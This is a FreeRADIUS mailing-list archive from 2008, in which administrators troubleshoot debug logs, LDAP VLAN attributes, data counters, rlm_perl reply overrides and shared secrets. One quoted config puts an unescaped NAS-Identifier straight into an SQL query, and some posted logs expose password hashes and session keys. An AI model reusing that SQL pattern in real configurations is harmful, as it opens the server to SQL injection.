TLS_accept: SSLv3 write server done A [peap] TLS_accept: SSLv3 flush data [peap] TLS_accept: Need to read more data: SSLv3 read client certificate A In SSL Handshake Phase In SSL Accept mode [peap] eaptls_process returned 13 [peap] EAPTLS_HANDLED ++[eap] returns handled Sending Access-Challenge of id 221 to 10.10.1.21 port 1645 [...] Going to the next request Waking up in 4.8 seconds. Cleaning up request 0 ID 220 with timestamp +68 Waking up in 0.1 seconds. Cleaning up request 1 ID 221 with timestamp +68 Ready to process requests. rad_recv: Access-Request packet from host 10.10.1.21 port 1645, id=222, length=156 User-Name = "DOMINIO\\msilvero" Framed-MTU = 1400 Called-Station-Id = "0019.2fdb.9e00" Calling-Station-Id = "001f.3c22.44c5" Service-Type = Login-User Message-Authenticator = 0x862b4eedab979983e604c4836e8ac526 EAP-Message = 0x020100130149504c414e5c6d73696c7665726f NAS-Port-Type = Wireless-802.11 NAS-Port = 475 NAS-IP-Address = 10.10.1.21 NAS-Identifier = "ap-ap" +- entering group authorize {...} ++[preprocess] returns ok ++[chap] returns noop ++[mschap] returns noop [suffix] No '@' in User-Name = "DOMINIO\msilvero", looking up realm NULL [suffix] N
RE: Duplicate IPs for Radius Clients with different secrets - allow any client IP?
Thank you for the info, David. I think the following is an example of how this could work, which I googled: > client 212.37.57.2 { >secret = "%{sql:SELECT secret FROM accesspoints WHERE id = %{raw:NAS-Identifier}}" >shortname = "just one of our example networks" >} I'm thinking I could even just have one client entry like this...but set to allow any IP. Is that possible? This would prevent me from having to track Internet IP changes among the multiple offices and locations where these separate WPA-Enterprise networks will be located at. Thanks! Eric > -Original Message- > From: freeradius-users-bounces+me=egeier@lists.freeradius.org > [mailto:freeradius-users-bounces+me=egeier@lists.freeradius.org] On > Behalf Of wlanmac > Sent: Wednesday, December 17, 2008 8:42 AM > To: freeradius-users@lists.freeradius.org > Subject: Re: Duplicate IPs for Radius Clients with different secrets > > It's easy! Just google for rlm_raw and use it with a SQL xlat rule to > pick out the shared secret from a database. I have been doing this way > for years... in FreeRADIUS v1 and v2. > > David > coova.org > > > Date: Wed, 17 Dec 2008 10:16:17 +0200 > > From: Johan Meiring > > Subject: Re: Duplicate IPs for Radius Clients with different secrets > > To: FreeRadius users mailing list > > > > Message-ID: <4948b551.6030...@pcservices.co.za> > > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > > > Eric Geier wrote: > > > > > > If I understand what you said, I would only need one IP entry (the > Internet > > > IP) in the config file for each location, right? > > > > > > Most of these locations will be using dynamic Internet IPs; I'm not > sure > > > how'd I keep the config updated. Plus this would make each > location/network > > > use the same shared secret among all their APs, which I want to > prevent. > > > > > > > > > Alan, > > > > The Nas-Identifier being available to dynamic clients will also solve > > Eric's problem. > > > > Any update on when it might be available? > > > > Thanks! > > > > > > -- > > > > > > Johan Meiring > > Cape PC Services CC > > Tel: (021) 883-8271 > > Fax: (021) 886-7782 > > > > > > > - > List info/subscribe/unsubscribe? See > http://www.freeradius.org/list/users.html > > > No virus found in this incoming message. > Checked by AVG - http://www.avg.com > Version: 8.0.176 / Virus Database: 270.9.19/1853 - Release Date: > 12/17/2008 8:31 AM - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: WISPr-Bandwidth question
Hello Kevin, I can't answer definitively, but I would assume that it would be done on your NAS(depending on your hardware these rules "could" be propagated to the child devices). It would defy all logic for it to be done on the client, Just as you would in an unauthenticated wired/wireless network it is always best to control traffic at the distribution point. Hope that helps. Take Care, Leigh Martell On Wed, Dec 17, 2008 at 12:14 PM, kevin wrote: > While an "out of the box" solution is where I'll probably end up, I'm > battling with myself over the idea of how to best manage bandwidth on a > network including multiple remote locations, with both wired and > wireless connections. > > I'm moving to using freeradius to authenticate (which ultimately will be > done by MAC for initial ease of setup) but I'm trying to figure out > where the Bandwidth attributes actually are used. > > IOW, when using WISPr-Bandwidth, does that modify the client connection > at the client computer or does that occur at a proxy or firewall device? > What I'm getting at is, is a captive portal necessary or can a person > simply have client authentication via freeradius and the client network > card handle managing its own bandwidth? And if so, is there any > possibility that the client computer could be modified by someone with a > bit of skill to bypass those controls? > > Hope that made sense. > > Cheers, > > Kevin > > > - > List info/subscribe/unsubscribe? See > http://www.freeradius.org/list/users.html > - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
WISPr-Bandwidth question
While an "out of the box" solution is where I'll probably end up, I'm battling with myself over the idea of how to best manage bandwidth on a network including multiple remote locations, with both wired and wireless connections. I'm moving to using freeradius to authenticate (which ultimately will be done by MAC for initial ease of setup) but I'm trying to figure out where the Bandwidth attributes actually are used. IOW, when using WISPr-Bandwidth, does that modify the client connection at the client computer or does that occur at a proxy or firewall device? What I'm getting at is, is a captive portal necessary or can a person simply have client authentication via freeradius and the client network card handle managing its own bandwidth? And if so, is there any possibility that the client computer could be modified by someone with a bit of skill to bypass those controls? Hope that made sense. Cheers, Kevin - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: FW: Working config file for data counter.
Have you read "It doesn't work in FAQ"? Post the radiusd -X output and your counter configuration. Tell us what you expected to happen. Ivan Kalik Kalik Informatika ISP Dana 17/12/2008, "Marcel Grandemange" piše: >>Good Day. > >>I am still struggling to get a working solution with freeradius and mysql >as backend. > >>What im trying to do simply is have the radius server use data counters >instead of time counters. > >>I want to limit a users collective data to amounts of 1gb,2gb,3gb, all the >way up. > >>And it must be resset on the first of the month. > >>I have tried many versions of freeradius with many different queries and >methods and there is ALWAYS something that doesn't seem to work properly. > >>With Freeradius 2.1.3 I cannot use anything above 4gb, although I followed >instructions on wiki to the tee for overcoming the wrapping problem. (wiki >>was outdated, but still tried) >>With 1.1.7 I think it was I would simply get arratic responses. Sometimes >worked fine with up to 8gb tested, the next month it wouldn't. 2gb limits >>would also only sometimes work. >>The only one that was consistant was the 1gb option. > > >>Now ive tried so many methods, versions , tricks and wiki's and docs.. It's >been years and still I cannot get it working correctly. There is a bit of >a >lack of docs on what I would like to do and ive come to the conclusion that >if I could see someone elses working config for this sort of setup I >could >deduce where im going wrong. > > >>Thank You! > >Is the only way to get this working to pay someone? If so who can help? Just >note this is private and im using this box to teach myself hence I cant >offer much... > >Input? > > >__ NOD32 3696 (20081216) Information __ > >This message was checked by NOD32 antivirus system. >http://www.eset.com > >- >List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html > > - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: external script reply
>I use external php script to get informations from the ldap. >exec getdata { > program = .../sg.php %{User-Name} > ..?.. >} >post-auth { > getdata >} > >in the php script I do an ldap query with the argument, >and take the important data (three word) into variables. > >How can I take this 3 data back to the Tunnel-Type, Tunnel-Medium-type >and Tunnel-Private-Group-Id items of the freeRadius. > Print them out (echo). One per line. Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: rlm_perl authentication override
Greetings, and thanks to Ivan and Alan for their feedback. I've been dumping variables, etc, in my rlm_perl script (using Devel::Symdump and Data::Dumper) trying to figure out where to change the Packet-Type from Access-Reject to Access-Accept without success. I've also gone over the rlm_perl.c file, etc, hoping something would jump out at me -- what I'm trying to do doesn't appear to be documented (for obvious reasons). I'm hoping someone on this list knows how to change the Packet-Type in a rlm_perl script. Any comments/pointers are appreciated. If I knew where to dig, I'd have at it. Thanks Henry - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
FW: Working config file for data counter.
>Good Day. >I am still struggling to get a working solution with freeradius and mysql as backend. >What im trying to do simply is have the radius server use data counters instead of time counters. >I want to limit a users collective data to amounts of 1gb,2gb,3gb, all the way up. >And it must be resset on the first of the month. >I have tried many versions of freeradius with many different queries and methods and there is ALWAYS something that doesn't seem to work properly. >With Freeradius 2.1.3 I cannot use anything above 4gb, although I followed instructions on wiki to the tee for overcoming the wrapping problem. (wiki >was outdated, but still tried) >With 1.1.7 I think it was I would simply get arratic responses. Sometimes worked fine with up to 8gb tested, the next month it wouldn't. 2gb limits >would also only sometimes work. >The only one that was consistant was the 1gb option. >Now ive tried so many methods, versions , tricks and wiki's and docs.. It's been years and still I cannot get it working correctly. There is a bit of >a lack of docs on what I would like to do and ive come to the conclusion that if I could see someone elses working config for this sort of setup I >could deduce where im going wrong. >Thank You! Is the only way to get this working to pay someone? If so who can help? Just note this is private and im using this box to teach myself hence I cant offer much... Input? __ NOD32 3696 (20081216) Information __ This message was checked by NOD32 antivirus system. http://www.eset.com - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: mac2vlan
alois blasbichler wrote: > I want to assign a certain vlan to a certain mac of a client-pc. > I tried the module mac2vlan - is there a better/other way ? > But it does not work. That module is intended to be used for the VMPS protocol, not RADIUS. > I created the file ${confdir}/mac2vlan with : > 00:40:96:B4:5B:0F,TECH-WLAN > > But normaly a vlan is defined with a number like "155". > How should this work ? > Am i missind something important ? > > Wath other steps i have to do ? You can configure the VLAN via RADIUS attributes. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: rlm_perl authentication override
Henry wrote: > I'm wondering though: during that small window period when the > Packet-Type is changed and returned, would it be possible that it would > affect other sessions running concurrently (separate threads)? No. When you do an LDAP query for a request, or process a request through the "users" file, it doesn't affect other requests that are being processed. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
mac2vlan
Hello list I want to assign a certain vlan to a certain mac of a client-pc. I tried the module mac2vlan - is there a better/other way ? But it does not work. I created the file ${confdir}/mac2vlan with : 00:40:96:B4:5B:0F,TECH-WLAN But normaly a vlan is defined with a number like "155". How should this work ? Am i missind something important ? Wath other steps i have to do ? Thank you luis - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: rlm_perl authentication override
Quoting t...@kalik.net: So check the "circumstances" before changing the Packet-Type. Of course, you are right :p, thanks. I'm wondering though: during that small window period when the Packet-Type is changed and returned, would it be possible that it would affect other sessions running concurrently (separate threads)? Presumably the changed Packet-Type would have a limited scope (ie, visible to the current executing thread/session only, and not others)? Regards Henry - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: rlm_perl authentication override
>Changing freeradius.internal Packet-Type from Access-Reject to >Access-Accept would affect ALL logins - even logins which *should* be >rejected. > >I'm referring to changing Access-Reject to Access-Accept under certain >circumstances only -- not globally for all logins. > So check the "circumstances" before changing the Packet-Type. Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
WiMAX Auth
Here's my problem: Wed Dec 17 15:53:16 2008 : Info: [wimax] WARNING: WiMAX-MN-NAI was not found in the request or in the reply. Wed Dec 17 15:53:16 2008 : Info: [wimax] WARNING: We cannot calculate MN-HA keys. Wed Dec 17 15:53:16 2008 : Info: [wimax] WARNING: WiMAX-IP-Technology not found in reply. Wed Dec 17 15:53:16 2008 : Info: [wimax] WARNING: Not calculating MN-HA keys My question is, where do I add these replies? I currently have my radius doing its lookups in a MySQL database. - Milligan - - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
external script reply
Hi, I have a question, I use external php script to get informations from the ldap. exec getdata { program = .../sg.php %{User-Name} ..?.. } post-auth { getdata } in the php script I do an ldap query with the argument, and take the important data (three word) into variables. How can I take this 3 data back to the Tunnel-Type, Tunnel-Medium-type and Tunnel-Private-Group-Id items of the freeRadius. like: $RAD_REPLY{'Reply-Message'}= 'salala' in perl (form wiki) please help thanks Gabor - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: rlm_perl authentication override
Quoting t...@kalik.net: Is there a way to change the reply from Access-Reject, to Access-Accept? Change freeradius.internal attribute Packet-Type in Post-Auth-Type Reject section. Changing freeradius.internal Packet-Type from Access-Reject to Access-Accept would affect ALL logins - even logins which *should* be rejected. I'm referring to changing Access-Reject to Access-Accept under certain circumstances only -- not globally for all logins. ...or am I misunderstanding what you're suggesting? Thanks Henry - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Duplicate IPs for Radius Clients with different secrets
It's easy! Just google for rlm_raw and use it with a SQL xlat rule to pick out the shared secret from a database. I have been doing this way for years... in FreeRADIUS v1 and v2. David coova.org > Date: Wed, 17 Dec 2008 10:16:17 +0200 > From: Johan Meiring > Subject: Re: Duplicate IPs for Radius Clients with different secrets > To: FreeRadius users mailing list > > Message-ID: <4948b551.6030...@pcservices.co.za> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed > > Eric Geier wrote: > > > > If I understand what you said, I would only need one IP entry (the Internet > > IP) in the config file for each location, right? > > > > Most of these locations will be using dynamic Internet IPs; I'm not sure > > how'd I keep the config updated. Plus this would make each location/network > > use the same shared secret among all their APs, which I want to prevent. > > > > > Alan, > > The Nas-Identifier being available to dynamic clients will also solve > Eric's problem. > > Any update on when it might be available? > > Thanks! > > > -- > > > Johan Meiring > Cape PC Services CC > Tel: (021) 883-8271 > Fax: (021) 886-7782 > > - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: IP per user
2008/12/17 : > AP uses DHCP not radius to assign IPs. So - no. You can reserve IPs for > devices but not users. > > Ivan Kalik > Kalik Informatika ISP > > > Dana 17/12/2008, "Sergio Belkin" piše: > >>Hi, >> >>I wonder if radius force to a given user eg jdoe that only get from >>an Access Point always the same IP address? >> >>Thanks in advance >>-- >>-- >>Open Kairos http://www.openkairos.com >>Watch More TV http://sebelk.blogspot.com >>Sergio Belkin - >>- >>List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html >> >> > > - Thanks Ivan, I guess that -- -- Open Kairos http://www.openkairos.com Watch More TV http://sebelk.blogspot.com Sergio Belkin - - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: IP per user
AP uses DHCP not radius to assign IPs. So - no. You can reserve IPs for devices but not users. Ivan Kalik Kalik Informatika ISP Dana 17/12/2008, "Sergio Belkin" piše: >Hi, > >I wonder if radius force to a given user eg jdoe that only get from >an Access Point always the same IP address? > >Thanks in advance >-- >-- >Open Kairos http://www.openkairos.com >Watch More TV http://sebelk.blogspot.com >Sergio Belkin - >- >List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html > > - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: rlm_perl authentication override
Quoting t...@kalik.net: Is there a way to change the reply from Access-Reject, to Access-Accept? There is a way to change the packet type but it is a bad idea. Placing unauthorized users in something like a guest VLAN should be the part of your NAS functionality, rather than (deliberately) breaking authentication on the radius server. Thanks for the response, Ivan. We don't have access to the NAS servers (we merely auth) and this is the only way we can do this cleanly (without physically unlocking the user, managing that process, etc). Can you provide pointers on how to change the reply? Thanks Henry - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: vlan in ldap - full version
It should be "replyItem". Not replay, reply. So its works! Thank you very much - several hours i searched the error by luis - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: vlan in ldap - full version
Not replay, reply. Ivan Kalik Kalik Informatika ISP Dana 17/12/2008, "alois blasbichler" piše: >> You have configured these as *check* items, not as *reply* items. Fix >> that. >> > >Hello > >Thank you. > >I changed to >--- >replayItem Tunnel-Type radiusTunnelType >replayItem Tunnel-Medium-TyperadiusTunnelMediumType >replayItem Tunnel-Private-Group-Id radiusTunnelPrivateGroupId > >But so it says that : > >By >luis > >rlm_ldap: performing search in dc=sb-brixen,dc=it, with filter (uid=test) >[ldap] Added User-Password = {MD5}qmP3j3bSY61V2vpYrvPZTg== in check items >[ldap] looking for check items in directory... >rlm_ldap: sambaNTPassword -> NT-Password == >0x3730353833444539334132364235333932313639333235314644313734413841 >rlm_ldap: sambaLMPassword -> LM-Password == >0x3037414538333031344236393035433631323837303833414331353839444544 >[ldap] looking for reply items in directory... >[ldap] user test authorized to use remote access >rlm_ldap: ldap_release_conn: Release Id: 0 >++[ldap] returns ok >++[expiration] returns noop > > >- >List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html > > - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: vlan in ldap - full version
alois blasbichler wrote: [...] > I changed to > --- > replayItem Tunnel-Type radiusTunnelType > replayItem Tunnel-Medium-TyperadiusTunnelMediumType > replayItem Tunnel-Private-Group-Id radiusTunnelPrivateGroupId > > But so it says that : It should be "replyItem". Kind regards, -- Lech Karol Pawłaszek "You will never see me fall from grace" [KoRn] - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: vlan in ldap - full version
You have configured these as *check* items, not as *reply* items. Fix that. Hello Thank you. I changed to --- replayItem Tunnel-Type radiusTunnelType replayItem Tunnel-Medium-TyperadiusTunnelMediumType replayItem Tunnel-Private-Group-Id radiusTunnelPrivateGroupId But so it says that : By luis rlm_ldap: performing search in dc=sb-brixen,dc=it, with filter (uid=test) [ldap] Added User-Password = {MD5}qmP3j3bSY61V2vpYrvPZTg== in check items [ldap] looking for check items in directory... rlm_ldap: sambaNTPassword -> NT-Password == 0x3730353833444539334132364235333932313639333235314644313734413841 rlm_ldap: sambaLMPassword -> LM-Password == 0x3037414538333031344236393035433631323837303833414331353839444544 [ldap] looking for reply items in directory... [ldap] user test authorized to use remote access rlm_ldap: ldap_release_conn: Release Id: 0 ++[ldap] returns ok ++[expiration] returns noop - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: How to log failed auth attempts?
Todd R. wrote: > It seems that most things I have read suggest that failed authentication > attempts are logged to the radius.log by default but they do not show up for > me. Edit raddb/radiusd.conf, and read the "log" section. It has configuration entries that control this behavior. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Duplicate IPs for Radius Clients with different secrets
Johan Meiring wrote: > The Nas-Identifier being available to dynamic clients will also solve > Eric's problem. > > Any update on when it might be available? No. Maybe some time next year. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: vlan in ldap - full version
alois blasbichler wrote: > I am trying to assign different vlans for my different Radius-users. > The good news is that with a user defined in the users file it works fine. ... > The message i get: > > [ldap] looking for check items in directory... > rlm_ldap: radiusTunnelPrivateGroupId -> Tunnel-Private-Group-Id:0 == "154" > rlm_ldap: radiusTunnelMediumType -> Tunnel-Medium-Type:0 == IEEE-802 > rlm_ldap: radiusTunnelType -> Tunnel-Type:0 == VLAN You have configured these as *check* items, not as *reply* items. Fix that. Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
IP per user
Hi, I wonder if radius force to a given user eg jdoe that only get from an Access Point always the same IP address? Thanks in advance -- -- Open Kairos http://www.openkairos.com Watch More TV http://sebelk.blogspot.com Sergio Belkin - - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: EAP/MD5 with mysql authentication failed
>IN sites-enabled/inner-tunnel >-- >authorize { >eap { >ok = return >} >files >sql >expiration >logintime >} > >authenticate { >eap >} > EAP-MD5 doesn't use inner-tunnel. Enable sql in default virtual server. Ivan Kalik Kalik Informatika ISP - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: vlan in ldap
alois blasbichler wrote: > Hello list > > I am trying to assign different vlans for my different Radius-users. > The good news is that with a user defined in the users file it works fine. Check ldap.attrmap if it has this lines: replyItem Tunnel-Type radiusTunnelType replyItem Tunnel-Medium-Type radiusTunnelMediumType replyItem Tunnel-Private-Group-Id radiusTunnelPrivateGroupId Kind regards, -- Lech Karol Pawłaszek "You will never see me fall from grace" [KoRn] - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Calling-Station-Id case sensitive
li...@justinawilliams.com wrote: > > I am not really up with perl... Is there any way that perl can rewrite > the request and take out either the . or : or - between characters as > well as make everything lower case? > > so that the calling-station-id request would be 00197da6ad06 > not 00:19:7d:a6:ad:06 or 00-19-7d-a6-ad-06 or 0019.7da6.ad06 > I have some unlang action for this that I use: - if ( Calling-Station-Id =~ /^([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2})$/i ) { update request { Calling-Station-Id := "%{1}-%{2}-%{3}-%{4}-%{5}-%{6}" } update control { Tmp-String-0 := "%{1}%{2}%{3}%{4}%{5}%{6}" } } if ( Called-Station-Id =~ /^([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2})$/i ) { update request { Called-Station-Id := "%{1}-%{2}-%{3}-%{4}-%{5}-%{6}" } } --- It seems to be RFCy if you keep with 00-11-22-33-44-55 as the style for MAC addresses, so outside FreeRADIUS it's stored in the RFC-manner[1] and for where I need to do 'fun' stuff[1] with it internally I use the Tmp-String-X family of internal variables. Cheers Alex [1] LDAP lookups for example, such as cn=001122334455 -- Alexander Clouter .sigmonster says: Do not use the blue keys on this terminal. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
vlan in ldap - full version
Hello list I was send the last mail wrongly - here the correct version : I am trying to assign different vlans for my different Radius-users. The good news is that with a user defined in the users file it works fine. The users file : testercleartext-Password := "alois" Tunnel-Type = VLAN, Tunnel-Medium-Type = IEEE-802, Tunnel-Private-Group-Id = 155 The message: ++[eap] returns ok Login OK: [tester] (from client ciscosw port 29 cli 00-1F-E1-23-71-85) +- entering group post-auth {...} ++[exec] returns noop Sending Access-Accept of id 255 to 10.53.240.10 port 32769 Tunnel-Type:0 = VLAN Tunnel-Medium-Type:0 = IEEE-802 Tunnel-Private-Group-Id:0 = "155" User-Name = "tester" MS-MPPE-Recv-Key = 0x283b539628ec3ece70444bce496d078fc67323356a6cd12f435f878743447f7a MS-MPPE-Send-Key = 0xa978c29338aa1547d14524b0f43bfcde45841e3bce0f9c30a0b6c3d57187d810 EAP-Message = 0x03130004 Message-Authenticator = 0x Finished request 12. But with my users in Ldap - it does not work - seems that radius dont replay the vlan-attributes Some hints? luis my user in ldap : dn: uid=test,ou=users,dc=sb-brixen,dc=it objectClass: radiusprofile radiusTunnelMediumType: IEEE-802 radiusTunnelType: VLAN radiusTunnelPrivateGroupId: 154 The message i get: [ldap] looking for check items in directory... rlm_ldap: radiusTunnelPrivateGroupId -> Tunnel-Private-Group-Id:0 == "154" rlm_ldap: radiusTunnelMediumType -> Tunnel-Medium-Type:0 == IEEE-802 rlm_ldap: radiusTunnelType -> Tunnel-Type:0 == VLAN ... Login OK: [test] (from client ciscosw port 29 cli 00-1F-E1-23-71-85) +- entering group post-auth {...} ++[exec] returns noop Sending Access-Accept of id 97 to 10.53.240.10 port 32769 User-Name = "test" MS-MPPE-Recv-Key = 0x460785611f313ad630d4947a9f319303a05238d5b340b0a32d38a58b81a416aa MS-MPPE-Send-Key = 0xceeebab47129af3baa96c6fa859b26434b3894a32fddeeffc4f86bb9dfc080b1 EAP-Message = 0x031a0004 Message-Authenticator = 0x Finished request 53. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Calling-Station-Id case sensitive
t...@kalik.net wrote: > > You can use perl lc function to make sure attribute is always lower case. > List perl before checkval. > I personally use lower() (pgsql) and do it at the SQL server end. Cheers Alex -- Alexander Clouter .sigmonster says: We are not a clone. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
vlan in ldap
Hello list I am trying to assign different vlans for my different Radius-users. The good news is that with a user defined in the users file it works fine. The users file : testercleartext-Password := "alois" Tunnel-Type = VLAN, Tunnel-Medium-Type = IEEE-802, Tunnel-Private-Group-Id = 155 The message: ++[eap] returns ok Login OK: [tester] (from client ciscosw port 29 cli 00-1F-E1-23-71-85) +- entering group post-auth {...} ++[exec] returns noop Sending Access-Accept of id 255 to 10.53.240.10 port 32769 Tunnel-Type:0 = VLAN Tunnel-Medium-Type:0 = IEEE-802 Tunnel-Private-Group-Id:0 = "155" User-Name = "tester" MS-MPPE-Recv-Key = 0x283b539628ec3ece70444bce496d078fc67323356a6cd12f435f878743447f7a MS-MPPE-Send-Key = 0xa978c29338aa1547d14524b0f43bfcde45841e3bce0f9c30a0b6c3d57187d810 EAP-Message = 0x03130004 Message-Authenticator = 0x Finished request 12. But with my users in Ldap - it does not work my user in ldap : dn: uid=test,ou=users,dc=sb-brixen,dc=it objectClass: radiusprofile radiusTunnelMediumType: IEEE-802 radiusTunnelType: VLAN radiusTunnelPrivateGroupId: 154 The message: [ldap] looking for check items in directory... rlm_ldap: radiusTunnelPrivateGroupId -> Tunnel-Private-Group-Id:0 == "154" rlm_ldap: radiusTunnelMediumType -> Tunnel-Medium-Type:0 == IEEE-802 rlm_ldap: radiusTunnelType -> Tunnel-Type:0 == VLAN ... - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: EAP/MD5 with mysql authentication failed
hi, dont set the default auth-type for users alan - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
How to log failed auth attempts?
Hello all, been spending lots of time reading the list archives, reading the docs, sample configs and so on but can't find a solution so I thought I would ping the list for some help. I am running FR 2.1.3 which I installed a few days ago. I have it doing most of what I need it to after a bit of work and lots of reading :) The thing I am stuck on right now is how to get FR to log failed login attempts with the reason for the failure. At the moment I have it logging the failed attempts in the radpostauth table in MySQL. The problem is it only logs the result as a failure with no other info.. I would love to get the Reply-Message in the table but will settle for this info in the Radius.log or any text based log. It seems that most things I have read suggest that failed authentication attempts are logged to the radius.log by default but they do not show up for me. How can I either get the failed authentications in a text log with the failure reason or get them in the MySQL table? The latter being preferred but again I will settle for the text logging if it's all that's available. I am a FR newb so the simple the solution, the better :) Thanks in advance for any help provided.. Regards, Todd R. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Sending Accounting Response
The only other option left is to use CoA. However, the radius client libraries that would form part of the NAS do not implement CoA. I have read up the source code of all radius client libraries offered part of FR and even made by others - none of them have a library which could be used to listen for radius packets on a given port and accept and acknowledge CoA/Packet of disconnect. So I would have to write this from scratch, and would be most happy to contribute back to community. But in all other world, CoA is a standart, that is used for purposes that you described. -- With best regards, Evgeniy Kozhuhovskiy Leader of Services group, MGTS, RUE Beltelecom - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Duplicate IPs for Radius Clients with different secrets
Eric Geier wrote: If I understand what you said, I would only need one IP entry (the Internet IP) in the config file for each location, right? Most of these locations will be using dynamic Internet IPs; I'm not sure how'd I keep the config updated. Plus this would make each location/network use the same shared secret among all their APs, which I want to prevent. Alan, The Nas-Identifier being available to dynamic clients will also solve Eric's problem. Any update on when it might be available? Thanks! -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html